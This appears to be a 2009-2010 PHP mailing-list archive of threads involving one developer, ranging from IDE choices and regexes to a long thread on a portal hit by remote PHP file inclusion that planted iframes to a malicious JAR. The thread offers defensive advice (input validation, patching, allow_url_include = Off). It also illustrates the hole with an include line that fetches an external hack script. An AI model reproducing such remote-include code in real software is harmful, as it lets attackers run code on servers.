http://www.ajaxload.info/ Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Thu, Jun 25, 2009 at 2:03 PM, Eddie Drapkin wrote: > On Thu, Jun 25, 2009 at 12:52 PM, Bastien Koert wrote: > > On Thu, Jun 25, 2009 at 11:51 AM, Michael A. Peters > wrote: > >> Martin Scotta wrote: > >>> > >>> I found extremely un-productive editors or IDEs like Eclipse or Zend > >>> Studio. > >>> > >>> I use SciTE. > >>> > >>> It don't has any feature you are talking about... > >>> > >>> but it.. > >>> # do not eat all you ram > >>> # starts in a microsecond > >>> # opens any type of file > >>> # paints the code in pretty colors. > >>> # has a little intellisense using pre-written words or api files > >>> > >>> > >> > >> I almost exclusively use bluefish, the closest I come to an IDE for > anything > >> I do is emacs + AUCTeX for my occasional TeX needs. > >> > >> I also use vim and on the rare occasions I'm stuck with Windows, > something I > >> think called PSPad (not sure, downloaded it awhile back at my parents > >> house). I actually have a license for Homesite, but I don't think I can > >> install it on their computer and I don't run Windows anymore. That was > nice. > >> > >> On a Mac - bbedit for everything. > >> > >> However, all that being said, I do very little php. Right now though a > >> little more than usual. 
> >> > >> -- > >> PHP General Mailing List (http://www.php.net/) > >> To unsubscribe, visit: http://www.php.net/unsub.php > >> > >> > > > > over the past little while I have been using > > > > komodo edit (free) - good (more like a text editor with some brains), > > good code completion and hinting > > aptana studio (free) - eclipse based, bigger learning curve, but lots > > of functionality > > netbeans (free) - good, nice interface > > > > > > > > > > -- > > > > Bastien > > > > Cat, the other other white meat > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > Well the thing about being productive out of the box with Zend Studio > isn't entirely related to Zend Studio, it's more of an Eclipse > problem. Eclipse itself, whether using it in a heavily modified form > like Aptana or PDT or Zend Studio, or just using it out of the box for > Java development or C/C++ development or anything in between, has a > ridiculously steep learning curve for what's really just a fancy text > editor. While this turns a lot of people off, I was lucky (although I > sure didn't think so at the time) enough to have it forced on me when > I was learning Java in school. And in the end, I'm pretty glad that I > was forced to learn Eclipse because it's been the go to editor for all > my coding needs, whether PHP, Python, C, Java, even complex shell > scripting. And whenever someone is learning to develop and gets to > the point that they'd actually take advantage of some of the more > advanced features of Eclipse - step through debugging, code > autocompletion, etc. - I recommend that they take some time out of > learning the code, or coding, and learn Eclipse. The second Java > class I took was actually "learning Eclipse" and it was one of the > more useful classes that I've taken, given that there's no longer a > learning curve for any IDE that I want to use. 
> > Yes, Eclipse is pretty intimidating and oftentimes more complicated > than it needs to be, but there's a level of customizability that > doesn't exist in any other editors that I've seen. Whether it's > making code look and behave exactly the same, or binding keybindings > to things like SVN commit / update / resolve, it's all possible in > Eclipse. Whether you use Aptana, PDT, Zend Studio (>= 6.0) or another > derivative, I'd definitely recommend using Eclipse and once you've > topped the learning curve, you'll be able to say that your IDE > actually boosts your productivity significantly, which is the ultimate > goal anyway. > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
[PHP] Regex Problem
Hi Folks,

I have a serious problem.

I must create a regular expression that matches everything that is between single quotes or double quotes. Easy? OK, I know, but I need that "everything" can also be a single quote or double quote.

If I have these SQL commands:

SELECT * FROM TSTRENIC.MEI_ACESSO WHERE UPPER(DS_MEI_ACS) LIKE *'%NOME' ASD ' AS'ASD'%'* AND USUARIO = *'oaksdpokasd'asda'* ORDER BY DS_MEI_ACS ASC;

SELECT * FROM TSTRENIC.MEI_ACESSO WHERE USUARIO_DATA BETWEEN *'2007-01-02'* AND *'2008-07-08'*

Does anyone have any idea?

I need an expression which matches the fields in bold.

Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
[PHP] Re: Regex Problem
The solution don't need to be with regex, if anyone can solve this with other way will be very helpfull . Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Fri, Jul 31, 2009 at 2:23 PM, Igor Escobar wrote: > Hi Folks, > I have a serious problem. > > must create a regular expression against all that is between single quote > or double quotes. Easy? Ok, i know, but i need that "everything" must to be > too an single quote or double quote. > > If i have this SQL command: > > SELECT * FROM TSTRENIC.MEI_ACESSO WHERE UPPER(DS_MEI_ACS) LIKE *'%NOME' > ASD ' AS'ASD'%' *AND USUARIO = *'oaksdpokasd'asda'* ORDER BY DS_MEI_ACS > ASC; > > SELECT * FROM TSTRENIC.MEI_ACESSO WHERE USUARIO_DATA BETWEEN *'2007-01-02' > * AND *'2008-07-08'* > > Anyone have any idea? > > > > I need an expression which case the fields in bold. > > > Regards, > Igor Escobar > Systems Analyst & Interface Designer > > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar (twitter) > > > >
Re: [PHP] Character encoding
Build some script to convert to these comments. Check this out: Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) 2009/8/5 b > On 08/05/2009 07:05 AM, Sándor Tamás (HostWare Kft.) wrote: > >> Hi, >> >> I have a mysql database, which the users can insert comments. As the users >> can be from different countries, with different character encoding, the >> mysql table can contain various special characters. >> >> How can I be sure to display these comments properly? I've found the >> mb_convert_encoding, and for some characters it works okay, but there are >> some really special characters which displayed as a '?'. >> >> Does anybody know some workarounds? >> >> Thanks, >> SanTa >> > > Use UTF-8. Create your database and its tables with UTF-8 char encoding. > eg. > > ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci > > Note there's no hyphen. > > Also, make sure the *data* is converted. You can use iconv for that. > > Next, ensure that the browser knows how to display the text. Use either a > header or a meta tag (or both): > > > > This is especially important for the page with the comments form. > > Any SQL file with your data (for import) should have the following at the > top: > > SET NAMES 'utf8'; > > If you export a dump make sure that line is present before trying to > import. > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
[PHP] Speed Issues PHP vs ASP.net
Recently I read this blog post about speed issues comparing PHP with ASP.net. Please read it and comment on what you think about it:

http://misfitgeek.com/blog/aspnet/php-versus-asp-net-ndash-windows-versus-linux-ndash-who-rsquo-s-the-fastest/

The big deal is: I don't know if this benchmark is true or false, but what is the PHP team doing about speed issues? Maybe results like this can tarnish the image of the language.

So, what do you think about it?

Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
[PHP] SWF Manipulation with PHP
Hi Folks!

A very long time ago I spent a little bit of my time trying to find out how I can load a SWF file, load a specific frame of that SWF file and save it as a JPG or any other format.

I tried "ming", but it can't load an external SWF movie. You can only CREATE a SWF. I tried libswf too, but I did not have success.

Does anyone have ANY idea that works?

Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
[PHP] Bitly-PHP - A PHP Bitly API to shorten URLs, expand and more.
Hi Guys!

Can you help me test my new library? It's a PHP library to use and enjoy the RESTful Bitly API to shorten URLs, expand and more:

http://github.com/igorescobar/Bitly-PHP

Any doubts, feel free to ask.

Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
Re: [PHP] Bitly-PHP - A PHP Bitly API to shorten URLs, expand and more.
Nice point. I will implement that ;) Thanks a lot! Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Wed, Mar 24, 2010 at 4:08 PM, Rene Veerman wrote: > nice code, but i'd like it better if the comments were in english ;) > > the only thing i see missing is some proper error reporting (in case > bit.ly is down or has changed api specs) > > On Wed, Mar 24, 2010 at 7:39 PM, Igor Escobar > wrote: > > Hi Guys! > > > > Can you help me to test my new library? > > It's about a PHP Library to use and enjoy the RESTful Bitly API to > shorten > > URLs, expand and more > > > > http://github.com/igorescobar/Bitly-PHP > > > > <http://github.com/igorescobar/Bitly-PHP>Any doubts, fell free to ask. > > > > <http://github.com/igorescobar/Bitly-PHP> > > Regards, > > Igor Escobar > > Systems Analyst & Interface Designer > > > > + http://blog.igorescobar.com > > + http://www.igorescobar.com > > + @igorescobar (twitter) > > >
Re: [PHP] How to redefine a function if it doesn't exist?
See http://br2.php.net/manual/en/function.create-function.php

Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)

On Tue, Mar 30, 2010 at 10:23 AM, David Otton <phpm...@jawbone.freeserve.co.uk> wrote:
> On 30 March 2010 14:16, Andre Polykanine wrote:
>
> > I need a quoted_printable_encode function but it's available only
> > since PHP 5.3. How do I redefine that function only if PHP version is
> > lower than 5.3?
>
> function_exists().
>
> if (!function_exists('myfunc')) {
>     function myfunc() {
>         ;
>     }
> }
>
> http://uk3.php.net/function_exists
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Security Issue
Hi Folks! The portal for which I work is suffering constant attacks that I feel are PHP Injection. Somehow the hacker is managing to change the cache files that our system generates, concatenating the HTML file with another that has an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system; he is inputting the code through some security hole. The problem is that the portal is very big and has lots and lots of partners hosted on our structure. We are failing to identify the focus of these attacks. Any ideas? Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)
Re: [PHP] Security Issue
Hi Ashley! Thanks for helping us!

OK, first thing, check all the file access logs, i.e. FTP logs, etc, just to make sure that it's not a case of a compromised password. There's a well-known issue with people who use FileZilla on Windows systems that allows passwords to be easily stolen.

*We've done this before. FTP logs are clean. We limit access to FTP to only authorized machines.*

Next, see if you can isolate the IP address(s) that might be making these changes, and then go back over the HTTP access logs to determine what URLs they are visiting on the site. This should give you an idea about where the attack is coming in from.

*I'll see if I can find a way to identify the IP of the person who changed the file last time. As he is injecting a PHP script within our server, the script itself is changing the file, so the default user apache is assumed to be who made the change.*

Make sure that any pre-built systems (i.e. shopping carts, blog or forum software) is patched and up-to-date. A lot of attacks are targeted at sites en masse because they are found to have the same flaw which, left unpatched, is like an open door to your server.

*We always encourage our partners to keep their systems current. They are usually blogs (WordPress) and plugins.*

It's also not a bad idea to change the passwords used to access the server, both for FTP and SSH. You might also need to scan the server with antivirus software (this is mainly for Windows servers really) to make sure that a rootkit hasn't been installed.

*All access via username and password is clean; if we identify unauthorized access, we will certainly do that!*

*Thank you for your help!
Let's try to identify the IP address of the person who changed the file and then we try to trace your browsing history!* * *Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:03 AM, Ashley Sheridan wrote: > On Mon, 2010-06-07 at 09:54 -0300, Igor Escobar wrote: > > Hi Folks! > > The portal for which I work is suffering constant attacks that I feel that > is PHP Injection. Somehow the hacker is getting to change the cache files > that our system generates. Concatenating the HTML file with another that > have an iframe to a malicious JAR file. Do you have any suggestions to > prevent this action? The hacker has no access to our file system, he is > imputing the code through some security hole. The problem is that the portal > is very big and has lots and lots partners hosted on our estructure > structure. We are failing to identify the focus of this attacks. > > Any ideas? > > > Regards, > Igor Escobar > Systems Analyst & Interface Designer > > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar (twitter) > > > OK, first thing, check all the file access logs, i.e. FTP logs, etc, just > to make sure that it's not a case of a compromised password. There's a > well-known issue with people who use FileZilla on Windows systems that > allows passwords to be easily stolen. > > Next, see if you can isolate the IP address(s) that might be making these > changes, and then go back over the HTTP access logs to determine what URLs > they are visiting on the site. This should give you an idea about where the > attack is coming in from. > > Make sure that any pre-built systems (i.e. shopping carts, blog or forum > software) is patched and up-to-date. A lot of attacks are targeted at sites > en-mass because they are found to have the same flaw which, left unpatched, > is like an open door to your server. 
> > It's also not a bad idea to change the passwords used to access the server, > both for FTP and SSH. You might also need to scan the server with antivirus > software (this is mainly for Windows servers really) to make sure that a > rootkit hasn't been installed. > > Thanks, > Ash > http://www.ashleysheridan.co.uk > > >
Re: [PHP] Security Issue
This was my fear. Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind wrote: > On 7 June 2010 14:54, Igor Escobar wrote: > > Hi Folks! > > > > The portal for which I work is suffering constant attacks that I feel > that > > is PHP Injection. Somehow the hacker is getting to change the cache files > > that our system generates. Concatenating the HTML file with another that > > have an iframe to a malicious JAR file. Do you have any suggestions to > > prevent this action? The hacker has no access to our file system, he is > > imputing the code through some security hole. The problem is that the > portal > > is very big and has lots and lots partners hosted on our estructure > > structure. We are failing to identify the focus of this attacks. > > > > Any ideas? > > > > Check all user input + upload: make sure that whatever comes from the > user is validated. Then check all output: make sure that everythin > output is escaped properly. Yes, it's an enormous task, but there's no > way around it. > > Regards > Peter > > -- > > WWW: http://plphp.dk / http://plind.dk > LinkedIn: http://www.linkedin.com/in/plind > BeWelcome/Couchsurfing: Fake51 > Twitter: http://twitter.com/kafe15 > >
Re: [PHP] Security Issue
I do not believe he is doing so through forms but PHP Injection. We have already met one of the files that he used to make the concatenation of the cache files. Need to know if there is a tool, anything, that we can install on the server and identify the hacker more easily because the manual labor is not giving much result. Thanks for all support! Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:08 AM, Phpster wrote: > > On Jun 7, 2010, at 8:54 AM, Igor Escobar wrote: > > Hi Folks! >> >> The portal for which I work is suffering constant attacks that I feel that >> is PHP Injection. Somehow the hacker is getting to change the cache files >> that our system generates. Concatenating the HTML file with another that >> have an iframe to a malicious JAR file. Do you have any suggestions to >> prevent this action? The hacker has no access to our file system, he is >> imputing the code through some security hole. The problem is that the >> portal >> is very big and has lots and lots partners hosted on our estructure >> structure. We are failing to identify the focus of this attacks. >> >> Any ideas? >> >> >> Regards, >> Igor Escobar >> Systems Analyst & Interface Designer >> >> + http://blog.igorescobar.com >> + http://www.igorescobar.com >> + @igorescobar (twitter) >> > > Can you implement a simple form dump process that would catch the form name > an the data being entered and save that? That would allow you to at least > see what script has the hole as you trap it. > > Bastien > > Sent from my iPod > >
Re: [PHP] Security Issue
It's not a SQL Injection or XSS problem, Michael. It's a PHP Injection problem. I know how fix that but the web site is very very huge, have lots and lots of partners and i'm have a bug difficult do identify the focus of the problem. Got it? Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle wrote: > It's not that bad. > > Use filter functions and sanity checks for input. > > Use htmlspecialchars() basically on output. > > That should take care of basically everything. > > > On Jun 7, 2010, at 6:16 AM, Igor Escobar wrote: > > This was my fear. >> >> Regards, >> Igor Escobar >> Systems Analyst & Interface Designer >> >> + http://blog.igorescobar.com >> + http://www.igorescobar.com >> + @igorescobar (twitter) >> >> >> >> >> >> On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind >> wrote: >> >> On 7 June 2010 14:54, Igor Escobar wrote: >>> >>>> Hi Folks! >>>> >>>> The portal for which I work is suffering constant attacks that I feel >>>> >>> that >>> >>>> is PHP Injection. Somehow the hacker is getting to change the cache >>>> files >>>> that our system generates. Concatenating the HTML file with another that >>>> have an iframe to a malicious JAR file. Do you have any suggestions to >>>> prevent this action? The hacker has no access to our file system, he is >>>> imputing the code through some security hole. The problem is that the >>>> >>> portal >>> >>>> is very big and has lots and lots partners hosted on our estructure >>>> structure. We are failing to identify the focus of this attacks. >>>> >>>> Any ideas? >>>> >>>> >>> Check all user input + upload: make sure that whatever comes from the >>> user is validated. Then check all output: make sure that everythin >>> output is escaped properly. Yes, it's an enormous task, but there's no >>> way around it. 
>>> >>> Regards >>> Peter >>> >>> -- >>> >>> WWW: http://plphp.dk / http://plind.dk >>> LinkedIn: http://www.linkedin.com/in/plind >>> BeWelcome/Couchsurfing: Fake51 >>> Twitter: http://twitter.com/kafe15 >>> >>> >>> > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] Security Issue
I think we're getting off topic here folks... Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan wrote: > On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote: > > Oh yeah. I do more than just intval() I make sure they didn't feed me > anything BUT numeric text first. I do sanity check before type > forcing :) > > I use garbage in garbage out. So I take what is given to me and yes I > escape if before the db of course as well, and then encode on output. > > On Jun 7, 2010, at 10:45 AM, Ashley Sheridan > wrote: > > > On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote: > >> > >> It's not that bad. > >> > >> Use filter functions and sanity checks for input. > >> > >> Use htmlspecialchars() basically on output. > >> > >> That should take care of basically everything. > >> > >> On Jun 7, 2010, at 6:16 AM, Igor Escobar > >> wrote: > >> > >> > This was my fear. > >> > > >> > Regards, > >> > Igor Escobar > >> > Systems Analyst & Interface Designer > >> > > >> > + http://blog.igorescobar.com > >> > + http://www.igorescobar.com > >> > + @igorescobar (twitter) > >> > > >> > > >> > > >> > > >> > > >> > On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind > >> > >> > wrote: > >> > > >> >> On 7 June 2010 14:54, Igor Escobar wrote: > >> >>> Hi Folks! > >> >>> > >> >>> The portal for which I work is suffering constant attacks that I > >> >>> feel > >> >> that > >> >>> is PHP Injection. Somehow the hacker is getting to change the > >> >>> cache files > >> >>> that our system generates. Concatenating the HTML file with > >> >>> another that > >> >>> have an iframe to a malicious JAR file. Do you have any > >> >>> suggestions to > >> >>> prevent this action? The hacker has no access to our file system, > >> >>> he is > >> >>> imputing the code through some security hole. 
The problem is that > >> >>> the > >> >> portal > >> >>> is very big and has lots and lots partners hosted on our > >> estructure > >> >>> structure. We are failing to identify the focus of this attacks. > >> >>> > >> >>> Any ideas? > >> >>> > >> >> > >> >> Check all user input + upload: make sure that whatever comes > >> from the > >> >> user is validated. Then check all output: make sure that everythin > >> >> output is escaped properly. Yes, it's an enormous task, but > >> there's > >> >> no > >> >> way around it. > >> >> > >> >> Regards > >> >> Peter > >> >> > >> >> -- > >> >> > >> >> WWW: http://plphp.dk / http://plind.dk > >> >> LinkedIn: http://www.linkedin.com/in/plind > >> >> BeWelcome/Couchsurfing: Fake51 > >> >> Twitter: http://twitter.com/kafe15 > >> >> > >> >> > >> > > > > htmlspecialchars() is really only good for user input that you are > > outputting to the browser. For inserting data into a database, use > > mysql_real_escape_string(). I find it's good to think carefully > > about what sort of data I expect and sanitise it accordingly. If I > > want a numerical value, I use intval($_GET['var']) or floatval(). > > For things like small text box elements, regex's work well depending > > on the data. For data from select lists of checkboxes, make sure the > > value given is within a list of pre-determined values you have. > > Basically, nothing from the user should be trusted at all, ever. > > > > As soon as you let go of that trust in the good honesty of people > > you'll do fine ;) > > > > Thanks, > > Ash > > http://www.ashleysheridan.co.uk > > > > > > > Why waste time validating an integer value when intval() will do that for > you? > > > Thanks, > Ash > http://www.ashleysheridan.co.uk > > >
Re: [PHP] Security Issue
PHP Injection is the technical name given to a security hole in PHP applications. When this gap there is a hacker can do with an external code that is interpreted as an inner code as if the code included was more a part of the script. // my code... // my code... include ('http:///externalhackscript.txt'); //my code... //my code.. I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT. Got it? Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan wrote: > On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote: > > > It's not a SQL Injection or XSS problem, Michael. > > > > It's a PHP Injection problem. I know how fix that but the web site is > very > > very huge, have lots and lots of partners and i'm have a bug difficult do > > identify the focus of the problem. > > > > Got it? > > > > > > Regards, > > Igor Escobar > > Systems Analyst & Interface Designer > > > > + http://blog.igorescobar.com > > + http://www.igorescobar.com > > + @igorescobar (twitter) > > > > > > > > > > > > On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle > wrote: > > > > > It's not that bad. > > > > > > Use filter functions and sanity checks for input. > > > > > > Use htmlspecialchars() basically on output. > > > > > > That should take care of basically everything. > > > > > > > > > On Jun 7, 2010, at 6:16 AM, Igor Escobar > wrote: > > > > > > This was my fear. > > >> > > >> Regards, > > >> Igor Escobar > > >> Systems Analyst & Interface Designer > > >> > > >> + http://blog.igorescobar.com > > >> + http://www.igorescobar.com > > >> + @igorescobar (twitter) > > >> > > >> > > >> > > >> > > >> > > >> On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind > > >> wrote: > > >> > > >> On 7 June 2010 14:54, Igor Escobar wrote: > > >>> > > >>>> Hi Folks! 
> > >>>> > > >>>> The portal for which I work is suffering constant attacks that I > feel > > >>>> > > >>> that > > >>> > > >>>> is PHP Injection. Somehow the hacker is getting to change the cache > > >>>> files > > >>>> that our system generates. Concatenating the HTML file with another > that > > >>>> have an iframe to a malicious JAR file. Do you have any suggestions > to > > >>>> prevent this action? The hacker has no access to our file system, he > is > > >>>> imputing the code through some security hole. The problem is that > the > > >>>> > > >>> portal > > >>> > > >>>> is very big and has lots and lots partners hosted on our estructure > > >>>> structure. We are failing to identify the focus of this attacks. > > >>>> > > >>>> Any ideas? > > >>>> > > >>>> > > >>> Check all user input + upload: make sure that whatever comes from the > > >>> user is validated. Then check all output: make sure that everythin > > >>> output is escaped properly. Yes, it's an enormous task, but there's > no > > >>> way around it. > > >>> > > >>> Regards > > >>> Peter > > >>> > > >>> -- > > >>> > > >>> WWW: http://plphp.dk / http://plind.dk > > >>> LinkedIn: http://www.linkedin.com/in/plind > > >>> BeWelcome/Couchsurfing: Fake51 > > >>> Twitter: http://twitter.com/kafe15 > > >>> > > >>> > > >>> > > > -- > > > PHP General Mailing List (http://www.php.net/) > > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > > > > What do you mean it's a PHP injection? PHP is all on the server, and the > only way to get at that if you don't have direct access to the server > (which you've said isn't possible as the passwords, etc are all fine) > then the bad data is coming from either a form or another area where > user data is expected. This data might be as simple as unsanitised URL > variables that are intended to fetch a blog entry, to form data sent in > a registration page. > > All data coming from the user is bad until proven otherwise. 
> > Thanks, > Ash > http://www.ashleysheridan.co.uk > > >
Re: [PHP] Security Issue
I'm totally agree with you Ash, I came up here to ask you guys some for light. Anything to well me to track that M%$#% F#$CK#$# and discover from where he's attacking. Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 3:06 PM, Ashley Sheridan wrote: > On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote: > > PHP Injection is the technical name given to a security hole in PHP > applications. When this gap there is a hacker can do with an external code > that is interpreted as an inner code as if the code included was more a part > of the script. > > > > // my code... > > // my code... > > include ('http:///externalhackscript.txt'); > > //my code... > > //my code.. > > > > I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT. > > > > Got it? > > > > > > Regards, > Igor Escobar > Systems Analyst & Interface Designer > > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar (twitter) > > > > > > On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan > wrote: > > > On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote: > > > It's not a SQL Injection or XSS problem, Michael. > > > > It's a PHP Injection problem. I know how fix that but the web site is > very > > very huge, have lots and lots of partners and i'm have a bug difficult do > > identify the focus of the problem. > > > > Got it? > > > > > > Regards, > > Igor Escobar > > Systems Analyst & Interface Designer > > > > + http://blog.igorescobar.com > > + http://www.igorescobar.com > > + @igorescobar (twitter) > > > > > > > > > > > > On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle > wrote: > > > > > It's not that bad. > > > > > > Use filter functions and sanity checks for input. > > > > > > Use htmlspecialchars() basically on output. > > > > > > That should take care of basically everything. 
> > > > > > > > > On Jun 7, 2010, at 6:16 AM, Igor Escobar > wrote: > > > > > > This was my fear. > > >> > > >> Regards, > > >> Igor Escobar > > >> Systems Analyst & Interface Designer > > >> > > >> + http://blog.igorescobar.com > > >> + http://www.igorescobar.com > > >> + @igorescobar (twitter) > > >> > > >> > > >> > > >> > > >> > > >> On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind > > >> wrote: > > >> > > >> On 7 June 2010 14:54, Igor Escobar wrote: > > >>> > > >>>> Hi Folks! > > >>>> > > >>>> The portal for which I work is suffering constant attacks that I > feel > > >>>> > > >>> that > > >>> > > >>>> is PHP Injection. Somehow the hacker is getting to change the cache > > >>>> files > > >>>> that our system generates. Concatenating the HTML file with another > that > > >>>> have an iframe to a malicious JAR file. Do you have any suggestions > to > > >>>> prevent this action? The hacker has no access to our file system, he > is > > >>>> imputing the code through some security hole. The problem is that > the > > >>>> > > >>> portal > > >>> > > >>>> is very big and has lots and lots partners hosted on our estructure > > >>>> structure. We are failing to identify the focus of this attacks. > > >>>> > > >>>> Any ideas? > > >>>> > > >>>> > > >>> Check all user input + upload: make sure that whatever comes from the > > >>> user is validated. Then check all output: make sure that everythin > > >>> output is escaped properly. Yes, it's an enormous task, but there's > no > > >>> way around it. > > >>> > > >>> Regards > > >>> Peter > > >>> > > >>> -- > > >>> > > >>> WWW: http://plphp.dk / http://plind.dk > > >>> LinkedIn: http://www.linkedin.com/in/plind > > >>> BeWelcome/Couchsurfing: Fake51 > > >>> Twitter: http://twitte
Re: [PHP] Security Issue
Hey Richard, I'll find out more about this parameter allow_url_include, thank you!

Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)

On Mon, Jun 7, 2010 at 5:26 PM, richard gray wrote:
> On 07/06/2010 20:00, Igor Escobar wrote:
>
>> PHP Injection is the technical name given to a security hole in PHP
>> applications. When this gap there is a hacker can do with an external code
>> that is interpreted as an inner code as if the code included was more a
>> part of the script.
>>
>> // my code...
>> // my code...
>> include ('http:///externalhackscript.txt');
>> //my code...
>> //my code..
>>
> can you not switch off remote file includes in php.ini?
> This will stop include/require from a remote host..
> i.e. allow_url_include = Off in php.ini
>
> HTH
> Rich
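One way to follow the advice given earlier in this thread (go back over the HTTP access logs) and narrow down which script holds the vulnerable include: the script below is an added example, not code from any poster on the list. It assumes Apache combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote

# Apache "combined" log format (assumption; adapt to the server's LogFormat).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A request parameter whose value is itself a URL is what an
# include($_GET[...]) style hole would consume.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)

# Constructed sample lines (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jun/2010:09:12:01 -0300] "GET /partners/blog-a/index.php?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Jun/2010:09:13:44 -0300] "GET /partners/blog-b/view.php?page=http://files.example.invalid/x.txt HTTP/1.1" 200 312 "-" "libwww-perl/5.8"',
    '198.51.100.23 - - [07/Jun/2010:09:13:50 -0300] "GET /partners/blog-b/view.php?page=http%253A%252F%252Ffiles.example.invalid%252Fx.txt HTTP/1.1" 200 298 "-" "libwww-perl/5.8"',
    '198.51.100.23 - - [07/Jun/2010:09:14:02 -0300] "GET /partners/shop/cart.php?tpl=ftp://files.example.invalid/y.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.8"',
    '203.0.113.9 - - [07/Jun/2010:09:15:10 -0300] "GET /out.php?url=https://www.example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def url_valued_params(target):
    """Split a request target and list the (name, value) pairs whose value is a URL."""
    path, _, query = target.partition("?")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # second decode catches double-encoded values
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return path, hits


def find_remote_include_candidates(lines):
    """Group URL-valued parameters by (script, parameter).

    Returns rows of (path, param, requests, served, ips), where `served`
    counts 2xx responses: the server ran the script instead of rejecting
    the request, so those scripts are the first to review.
    """
    stats = defaultdict(lambda: {"requests": 0, "served": 0, "ips": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, hits = url_valued_params(rec["target"])
        for name, _value in hits:
            entry = stats[(path, name)]
            entry["requests"] += 1
            entry["ips"].add(rec["ip"])
            if rec["status"].startswith("2"):
                entry["served"] += 1
    return sorted(
        ((path, name, s["requests"], s["served"], sorted(s["ips"]))
         for (path, name), s in stats.items()),
        key=lambda r: (-r[3], -r[2], r[0]),
    )


if __name__ == "__main__":
    for path, name, requests, served, ips in find_remote_include_candidates(SAMPLE_LOG):
        print(f"{path} param={name} requests={requests} served={served} ips={','.join(ips)}")
```

Scripts that answered such requests with a 2xx status are the first ones to read for an include/require fed from request data; redirect-style parameters like the constructed `/out.php?url=` row are expected false positives.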
Re: [PHP] PHP cron job optimization
